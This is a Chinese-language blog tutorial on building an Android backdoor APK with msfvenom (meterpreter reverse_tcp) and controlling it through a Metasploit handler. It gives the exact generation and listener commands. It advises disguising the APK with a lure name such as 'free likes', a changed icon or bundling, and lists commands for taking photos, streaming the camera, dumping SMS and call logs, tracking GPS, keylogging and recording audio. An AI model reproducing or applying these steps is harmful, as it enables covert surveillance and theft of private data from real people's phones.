Kali Linux利用MSF入侵安卓手机

这篇具有很好参考价值的文章主要介绍了Kali Linux利用MSF入侵安卓手机。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Kali Linux利用MSF入侵安卓手机

一、什么是msf
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

演示环境
使用Kali 2021.3进行演示操作
目标靶机: 模拟器逍遥 Android 7.1.2
软件:msfvenom、msfconsole(Kali系统内置)

二、渗透流程
1.进入管理员模式
命令: sudo su
解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令
kali做安卓木马免杀,网络,android,linux,运维
提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可

2.生成可执行木马文件
命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk
实例: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写免费刷赞,可能更容易让目标主机上钩
kali做安卓木马免杀,网络,android,linux,运维
这个就是Kali主机的IP地址

接下来运行命令生成木马
kali做安卓木马免杀,网络,android,linux,运维

默认生成的文件在根目录下
kali做安卓木马免杀,网络,android,linux,运维
把刚才生成的安卓后门放到目标靶机中去

3.运行msfconsole命令
命令: msfconsole

kali做安卓木马免杀,网络,android,linux,运维
4.配置参数
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload android/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)
(4)命令: set lport 5555(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)

参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行

详细攻击配置参数演示:
kali做安卓木马免杀,网络,android,linux,运维
现在等待靶机打开APP就可以了
kali做安卓木马免杀,网络,android,linux,运维
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

6.查看用户
(1)命令: sessions(查看上钩的用户)
(2)命令: sessions -i 1(选择需要攻击的用户)
kali做安卓木马免杀,网络,android,linux,运维
出现meterpreter你就已经成功的入侵成功
三、meterpreter入侵安卓手机命令
1.查看对方手机系统信息
命令: sysinfo
kali做安卓木马免杀,网络,android,linux,运维
2.查看对方手机安装哪些app文件
命令: app_list

3.远程控制对方手机拍摄一张照片
命令: webcam_snap
kali做安卓木马免杀,网络,android,linux,运维

4.远程控制对方手机开起视频聊天
命令: webcam_chat

5.实时查看对方手机的信息
命令: dump_sms
kali做安卓木马免杀,网络,android,linux,运维
6.获取对方手机的通讯录
命令: dump_calllog
kali做安卓木马免杀,网络,android,linux,运维
7.实时获取对方手机GPS定位
命令: geolocate

kali做安卓木马免杀,网络,android,linux,运维
8.更多命令
还可以查看帮助文档,命令help

cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程

meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本

把文件上传到靶机命令
kali做安卓木马免杀,网络,android,linux,运维
把文件下载到主机命令
kali做安卓木马免杀,网络,android,linux,运维文章来源地址https://www.toymoban.com/news/detail-682881.html

到了这里,关于Kali Linux利用MSF入侵安卓手机的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • MSF入侵安卓手机

    MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。 我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。当然还有

    2024年02月06日
    浏览(42)
  • 网络安全kali web安全 Kali之msf简单的漏洞利用

    靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 从扫描出的端口发现,目标主机开启了135端口,服务为msrpc(远程过程调用服务),即Windows的RPC服务。 ​针对这个服务,我们就可

    2024年02月09日
    浏览(43)
  • kali使用msf+apkhook520+cploar实现安卓手的攻击

    学习网络安全的过程中,突发奇想怎么才能控制或者说是攻击手机 边找工作边实验 话不多说启动kali 首先使用kali自带的msfvenom写上这样一段代码 选择安卓 kali的ip 一个空闲的端口 要输出的文件名 接着我们就会得到一个木马安装包 但是现在的安装包安装时会提示你你这是为旧

    2024年04月22日
    浏览(83)
  • Kali linux windows木马(外网) 保姆级教学

    前言 实现外网控制需要一个外网的IP负责监听,本次使用的是https://www.fgnwct.com(飞鸽内网穿透)有免费的隧道 kali.org(kali官网) 详细教程查询官网。 此系列仅用于工作和学习,禁止用于非法攻击。一切遵守《网络安全法》 环境 windows7 kali linux 2021 下载客户端,解压出文件 \\\'\\\'

    2023年04月26日
    浏览(37)
  • Kali Linux渗透测试小实践——Metasploit与后门木马

    目录 一、环境和工具准备 1.Metasploit 2.Kali Linux与靶机 二、实践过程 1.打开Kali Linux,进入终端 2.输入生成木马的命令,并配置相关参数 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评

    2024年02月13日
    浏览(42)
  • 利用MSF打包加固APK对安卓手机进行控制

    由于经典的MSF生成apk安装包控制,版本较低,高版本安卓手机可能会出现版本不支持或无法使用的现象,而且apk无法正常使用,没有图形化界面,比较假。 相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标

    2024年01月16日
    浏览(42)
  • 在安卓手机搭建kali环境,手机变成便携式渗透神器

    kali是著名的黑客专用系统,一般都是直接装在物理机或者虚拟机上,我们可以尝试把kali安装在手机上,把手机打造成一个便携式渗透神器。 我们需要下载以下3款软件: (1).Termux(终端模拟器) (2).AnLinux(里边有各种安装liunx的命令) (3).vnc view(远程控制客户端) 下载地址点击下载

    2024年02月15日
    浏览(39)
  • 肥肠恐布--探索Kali Linux中的Metasploit Framework(MSF听说肾透大佬经常用)

    请注意,在使用Metasploit Framework进行渗透测试和漏洞利用时,务必遵守合法和授权的原则,此文仅供大家学习参考,请确保您获得了适当的授权,并遵守法律和合规性要求。非法使用和滥用导致严重的法律后果自负。 目录 前言 一、什么是Metasploit Framework(MSF)? 二、Metaspl

    2024年02月15日
    浏览(43)
  • KaLi做木马渗透实战案例

    此文章可能会包含敏感以及危险的命令❗❗❗命令有风险,回车需谨慎。 此文章仅供学习交流与参考使用,禁止运用于任何非法行动或测试中,若有预期之外的后果,将不承担任何责任!! ┌──( root💀KaLi-Erhe )-[ ~ ] └─# cat 重要的事情说三遍 ❗❗❗ ⭕命令有风险,回车

    2024年02月11日
    浏览(42)
  • bochs在安卓上模拟kali linux系统

    本文将介绍如何在安卓手机上安装并运行Kali系统,我们可以使用Kali系统来破解Wifi密码,当然它的功能远不止于此,它还有非常强大而且实用的功能,同时Kali系统对硬件配置要求并不高,如果你身边有很久不用的旧手机那么可以尝试安装并运行Kali系统,下文将详细介绍如何

    2024年02月04日
    浏览(51)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包